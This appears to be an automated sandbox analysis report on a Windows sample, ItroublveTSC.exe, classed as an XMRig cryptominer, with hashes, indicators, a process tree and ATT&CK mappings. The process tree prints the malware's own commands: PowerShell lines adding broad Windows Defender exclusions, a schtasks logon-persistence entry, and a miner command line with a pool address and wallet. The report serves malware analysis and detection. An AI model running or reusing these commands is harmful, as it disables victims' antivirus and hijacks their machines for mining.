xmrig | 51353852176f069b6ab794f567a7cc2064341c8b80d9dd4ba0cfd8ca9948ae35

Analysis

max time kernel
150s
max time network
152s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
20-12-2024 02:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ItroublveTSC.exe
Size

2.4MB
MD5

b5915bb34f01bad573a6cc0c314b9b8b
SHA1

8b10c4cbdf11fc016d9a48c79afd3ac05a13939d
SHA256

51353852176f069b6ab794f567a7cc2064341c8b80d9dd4ba0cfd8ca9948ae35
SHA512

6559d86bd6970a07c31c4fa330f41a50136b6d0abfa14e3782f5eaff1cbdfc9a1f39b3f1af4d2c0d181a7c83b73145a68ac54452ac21fe8f9584c47d9ac173c1
SSDEEP

49152:TAbfHjnTDRqfevVL3DfQ3QUzbzO9ayYaPSPFcKKiNixScEU4a3/B3D:TiPAfevVL3bQRO8Ea9csExN/r53D

Score

10^/10

xmrig execution miner

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 16 IoCs

miner

resource	yara_rule
behavioral1/memory/2308-84-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-74-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-66-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-79-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-77-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-72-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-71-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-69-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-65-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-63-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-61-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-58-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-83-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-82-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-85-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2308-81-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2952	powershell.exe
2688	powershell.exe
2092	powershell.exe
236	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2672	services32.exe
2676	sihost64.exe

Loads dropped DLL 2 IoCs

pid	Process
2236	cmd.exe
1032	conhost.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\services32.exe	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\services32.exe	conhost.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1032 set thread context of 2308	1032	conhost.exe	47

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2856	schtasks.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
3064	conhost.exe
2952	powershell.exe
2688	powershell.exe
1032	conhost.exe
1032	conhost.exe
2092	powershell.exe
236	powershell.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe
2308	explorer.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3064	conhost.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	1032	conhost.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	236	powershell.exe
Token: SeLockMemoryPrivilege	2308	explorer.exe
Token: SeLockMemoryPrivilege	2308	explorer.exe

Suspicious use of WriteProcessMemory 61 IoCs

description	pid	Process	procid_target
PID 108 wrote to memory of 3064	108	ItroublveTSC.exe	29
PID 108 wrote to memory of 3064	108	ItroublveTSC.exe	29
PID 108 wrote to memory of 3064	108	ItroublveTSC.exe	29
PID 108 wrote to memory of 3064	108	ItroublveTSC.exe	29
PID 3064 wrote to memory of 2820	3064	conhost.exe	30
PID 3064 wrote to memory of 2820	3064	conhost.exe	30
PID 3064 wrote to memory of 2820	3064	conhost.exe	30
PID 2820 wrote to memory of 2952	2820	cmd.exe	32
PID 2820 wrote to memory of 2952	2820	cmd.exe	32
PID 2820 wrote to memory of 2952	2820	cmd.exe	32
PID 3064 wrote to memory of 2712	3064	conhost.exe	34
PID 3064 wrote to memory of 2712	3064	conhost.exe	34
PID 3064 wrote to memory of 2712	3064	conhost.exe	34
PID 2712 wrote to memory of 2856	2712	cmd.exe	36
PID 2712 wrote to memory of 2856	2712	cmd.exe	36
PID 2712 wrote to memory of 2856	2712	cmd.exe	36
PID 2820 wrote to memory of 2688	2820	cmd.exe	37
PID 2820 wrote to memory of 2688	2820	cmd.exe	37
PID 2820 wrote to memory of 2688	2820	cmd.exe	37
PID 3064 wrote to memory of 2236	3064	conhost.exe	38
PID 3064 wrote to memory of 2236	3064	conhost.exe	38
PID 3064 wrote to memory of 2236	3064	conhost.exe	38
PID 2236 wrote to memory of 2672	2236	cmd.exe	40
PID 2236 wrote to memory of 2672	2236	cmd.exe	40
PID 2236 wrote to memory of 2672	2236	cmd.exe	40
PID 2672 wrote to memory of 1032	2672	services32.exe	41
PID 2672 wrote to memory of 1032	2672	services32.exe	41
PID 2672 wrote to memory of 1032	2672	services32.exe	41
PID 2672 wrote to memory of 1032	2672	services32.exe	41
PID 1032 wrote to memory of 2760	1032	conhost.exe	42
PID 1032 wrote to memory of 2760	1032	conhost.exe	42
PID 1032 wrote to memory of 2760	1032	conhost.exe	42
PID 2760 wrote to memory of 2092	2760	cmd.exe	44
PID 2760 wrote to memory of 2092	2760	cmd.exe	44
PID 2760 wrote to memory of 2092	2760	cmd.exe	44
PID 1032 wrote to memory of 2676	1032	conhost.exe	45
PID 1032 wrote to memory of 2676	1032	conhost.exe	45
PID 1032 wrote to memory of 2676	1032	conhost.exe	45
PID 2760 wrote to memory of 236	2760	cmd.exe	46
PID 2760 wrote to memory of 236	2760	cmd.exe	46
PID 2760 wrote to memory of 236	2760	cmd.exe	46
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 1032 wrote to memory of 2308	1032	conhost.exe	47
PID 2676 wrote to memory of 2136	2676	sihost64.exe	48
PID 2676 wrote to memory of 2136	2676	sihost64.exe	48
PID 2676 wrote to memory of 2136	2676	sihost64.exe	48
PID 2676 wrote to memory of 2136	2676	sihost64.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe
"C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:108
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ItroublveTSC.exe"
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2688
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2856
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Windows\system32\services32.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2236
  - - C:\Windows\system32\services32.exe
      C:\Windows\system32\services32.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2672
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services32.exe"
        5⤵
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1032
      - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:236
      - C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2676
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        7⤵
        
        PID:2136
      - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=44GUTQ7WqysSjLDCXfTnsYLCVJNGp67AECA9kTrAvjYCNz3ScZkYXZKP2EbR3DfbXPUYw6bMkaBuYCd6PdJCYngr4WtCeFt --pass=troublve --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ba79ebea0a1fa26ac7b73a83ecc3e4b6

SHA1
b357d375519970cfcbc8b3e90761882f4fe94949

SHA256
e9f4bd32ea1a7135c5f2064ad71473a577e62c64e666e0beb2a02d6bf0658d5d

SHA512
6a9ec91aece01a8f77360c46f53237a0bc72b257c8083eb68ae357657030156e30dbc48730ab67dcc985d84a0e70aad6d080d298ccff64b97dd9030388d0bbc7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2aaf37324db31bc063ec73a2f13c2280

SHA1
caa341b6e5ae3d00806c19b6070600d4d1eae235

SHA256
3c6d9e345ac2dae41be9fa178d5c3ee9388c6c5e1dc4eee498edee07d9d1765a

SHA512
a22766821ae124f3771a9f41fb30b697e0543256fc124685057a487c934280018b1d41cc4a072841c89ef4f36a3dbd22a1e077f8ce6c5462e37b8f2cc486686a

Download Submit
C:\Windows\System32\services32.exe

Filesize
2.4MB

MD5
b5915bb34f01bad573a6cc0c314b9b8b

SHA1
8b10c4cbdf11fc016d9a48c79afd3ac05a13939d

SHA256
51353852176f069b6ab794f567a7cc2064341c8b80d9dd4ba0cfd8ca9948ae35

SHA512
6559d86bd6970a07c31c4fa330f41a50136b6d0abfa14e3782f5eaff1cbdfc9a1f39b3f1af4d2c0d181a7c83b73145a68ac54452ac21fe8f9584c47d9ac173c1

Download Submit
\Windows\System32\Microsoft\Libs\sihost64.exe

Filesize
32KB

MD5
80a45dc6a5c273239cd22ecd5494a6c1

SHA1
a048888227a118cc5aec4bd898f300f9e1529563

SHA256
e456485cef081def1683d544d3c80c3d409a9a85364dbf3d34801c6cbbdfdc23

SHA512
5f379ac81656e3c622d61efacd00831d7688dba95f5671ea83a0f37fdf04bd3004038044a0788c0ec707ada94f27a89ec7ef152eb4d785490b87669d260233ac

Download Submit
memory/2136-87-0x0000000000200000-0x0000000000206000-memory.dmp

Filesize
24KB

Download
memory/2136-86-0x00000000000A0000-0x00000000000A7000-memory.dmp

Filesize
28KB

Download
memory/2308-65-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-61-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-53-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-81-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-85-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-82-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-83-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-56-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-58-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-63-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-69-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-54-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-71-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-72-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-80-0x0000000000160000-0x0000000000180000-memory.dmp

Filesize
128KB

Download
memory/2308-76-0x000007FFFFFDC000-0x000007FFFFFDD000-memory.dmp

Filesize
4KB

Download
memory/2308-77-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-79-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-84-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-74-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2308-66-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2688-25-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2688-24-0x000000001B370000-0x000000001B652000-memory.dmp

Filesize
2.9MB

Download
memory/2952-15-0x000007FEF3A30000-0x000007FEF43CD000-memory.dmp

Filesize
9.6MB

Download
memory/2952-11-0x000000001B460000-0x000000001B742000-memory.dmp

Filesize
2.9MB

Download
memory/2952-10-0x000007FEF3CEE000-0x000007FEF3CEF000-memory.dmp

Filesize
4KB

Download
memory/2952-13-0x000007FEF3A30000-0x000007FEF43CD000-memory.dmp

Filesize
9.6MB

Download
memory/2952-14-0x000007FEF3A30000-0x000007FEF43CD000-memory.dmp

Filesize
9.6MB

Download
memory/2952-17-0x000007FEF3A30000-0x000007FEF43CD000-memory.dmp

Filesize
9.6MB

Download
memory/2952-16-0x000007FEF3A30000-0x000007FEF43CD000-memory.dmp

Filesize
9.6MB

Download
memory/2952-18-0x000007FEF3A30000-0x000007FEF43CD000-memory.dmp

Filesize
9.6MB

Download
memory/2952-12-0x0000000002510000-0x0000000002518000-memory.dmp

Filesize
32KB

Download
memory/3064-5-0x000007FEF65A0000-0x000007FEF6F8C000-memory.dmp

Filesize
9.9MB

Download
memory/3064-4-0x000007FEF65A0000-0x000007FEF6F8C000-memory.dmp

Filesize
9.9MB

Download
memory/3064-0-0x0000000000130000-0x0000000000351000-memory.dmp

Filesize
2.1MB

Download
memory/3064-33-0x000007FEF65A0000-0x000007FEF6F8C000-memory.dmp

Filesize
9.9MB

Download
memory/3064-3-0x000007FEF65A0000-0x000007FEF6F8C000-memory.dmp

Filesize
9.9MB

Download
memory/3064-26-0x000007FEF65A3000-0x000007FEF65A4000-memory.dmp

Filesize
4KB

Download
memory/3064-27-0x000007FEF65A0000-0x000007FEF6F8C000-memory.dmp

Filesize
9.9MB

Download
memory/3064-2-0x000000001B380000-0x000000001B5A0000-memory.dmp

Filesize
2.1MB

Download
memory/3064-1-0x000007FEF65A3000-0x000007FEF65A4000-memory.dmp

Filesize
4KB

Download